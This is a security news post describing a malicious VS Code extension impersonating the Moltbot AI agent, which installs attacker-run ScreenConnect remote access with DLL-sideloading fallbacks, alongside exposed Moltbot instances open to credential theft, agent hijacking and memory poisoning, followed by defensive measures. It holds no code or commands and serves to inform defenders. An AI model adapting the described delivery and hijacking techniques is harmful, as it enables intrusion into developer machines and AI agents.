When the AI Assistant Opens the Door: Fake Moltbot Extension Turns Developers into an Entry Point
- Javier Conejo del Cerro
- hace 2 días
- 3 Min. de lectura

The rapid adoption of AI coding assistants has reshaped developer workflows, but it has also created a new and attractive attack surface. In January 2026, security researchers uncovered a malicious Visual Studio Code extension impersonating Moltbot (formerly Clawdbot), an open-source AI agent framework with tens of thousands of GitHub stars. By abusing brand trust, insecure-by-default deployments, and the elevated privileges of developer environments, attackers combined marketplace abuse, remote access tooling, and AI agent misconfigurations to establish persistent access and enable large-scale data exposure and agent hijacking.
Phase 1 – Trust as the Entry Vector
The attack began with a malicious extension published on the official VS Code Marketplace under the name “ClawdBot Agent – AI Coding Assistant.” The extension falsely claimed to provide AI coding capabilities for Moltbot, capitalizing on the tool’s popularity despite Moltbot having no legitimate VS Code extension.
Developers searching for Moltbot-related tooling were tricked into installing the extension from a trusted marketplace, lowering suspicion and bypassing organizational controls that often assume marketplace content to be vetted and safe. Once installed, the extension was automatically executed every time VS Code launched, giving the attackers reliable code execution on developer machines.
Phase 2 – Payload Delivery and Persistence
Upon execution, the extension retrieved a remote config.json file from attacker-controlled infrastructure. This configuration directed the extension to download and execute Code.exe, which deployed a legitimate remote desktop application: ConnectWise ScreenConnect.
The attackers had set up their own ScreenConnect relay server and distributed a preconfigured client through the extension. As soon as the extension was installed, the ScreenConnect client connected back to attacker infrastructure, granting persistent, interactive remote access to the compromised host.
To ensure resilience, the extension included multiple fallback delivery mechanisms. If the primary infrastructure was unavailable, it could retrieve a malicious DLL (DWrite.dll, written in Rust) and sideload it to deliver the same payload via Dropbox or alternative domains. Additional hard-coded URLs and batch-script–based delivery paths ensured that the ScreenConnect payload could still be deployed even if individual methods failed. This redundancy highlights deliberate planning for operational reliability rather than opportunistic abuse.
Phase 3 – AI Agent Exposure and Data Compromise
Beyond the malicious extension itself, parallel research revealed systemic security risks in Moltbot deployments. Hundreds of Moltbot instances were found exposed online due to reverse proxy misconfigurations that treated internet traffic as “local” and therefore trusted. Moltbot’s design auto-approved such connections without authentication.
As a result, attackers could access configuration data, API keys, OAuth credentials, chat histories, and long-term “memories” stored in plaintext. Because Moltbot agents can act autonomously across platforms like Slack, Telegram, Discord, WhatsApp, Signal, and Microsoft Teams, a compromised agent can impersonate its operator, inject messages into conversations, manipulate responses, and exfiltrate sensitive organizational data without immediate detection.
Researchers also warned of agent hijacking and memory poisoning, where attackers not only steal data but alter an agent’s stored context and behavior. This elevates the threat from traditional credential theft to long-term manipulation of AI-driven workflows. Major infostealer families such as RedLine, Lumma, and Vidar have already begun adapting to specifically target Moltbot directory structures to harvest this high-value data.
Measures to Defend Against the Attack
Organizations and developers should treat AI agents and developer environments as high-risk assets and implement layered controls, including:
Removing the malicious VS Code extension and auditing all installed IDE plugins
Reviewing Moltbot configurations and disabling unauthenticated or auto-approved connections
Revoking all API keys, OAuth tokens, and service integrations linked to Moltbot instances
Restricting or monitoring remote access tools such as ScreenConnect
Hardening reverse proxy configurations and enforcing proper authentication boundaries
Implementing network segmentation and outbound traffic monitoring for developer endpoints
Sandboxing or strictly vetting third-party AI “skills” and plugins
Monitoring for infostealers and RAT activity on developer machines
Treating AI agents as privileged identities subject to least privilege and continuous monitoring
The fake Moltbot VS Code extension campaign illustrates how AI tooling has become a prime target for attackers seeking deep, durable access into organizations. By blending trusted marketplaces, legitimate remote access software, and insecure AI agent architectures, attackers can bypass traditional controls and shift from simple data theft to agent-level compromise.
This incident underscores a broader trend: AI agents are not just applications, but autonomous actors with memory, reach, and authority. When misconfigured or compromised, they become powerful force multipliers for attackers. Securing AI-assisted development workflows therefore requires moving beyond plugin hygiene and into a mindset where AI agents are protected with the same rigor as human users and critical service accounts.
The Hacker News




Comentarios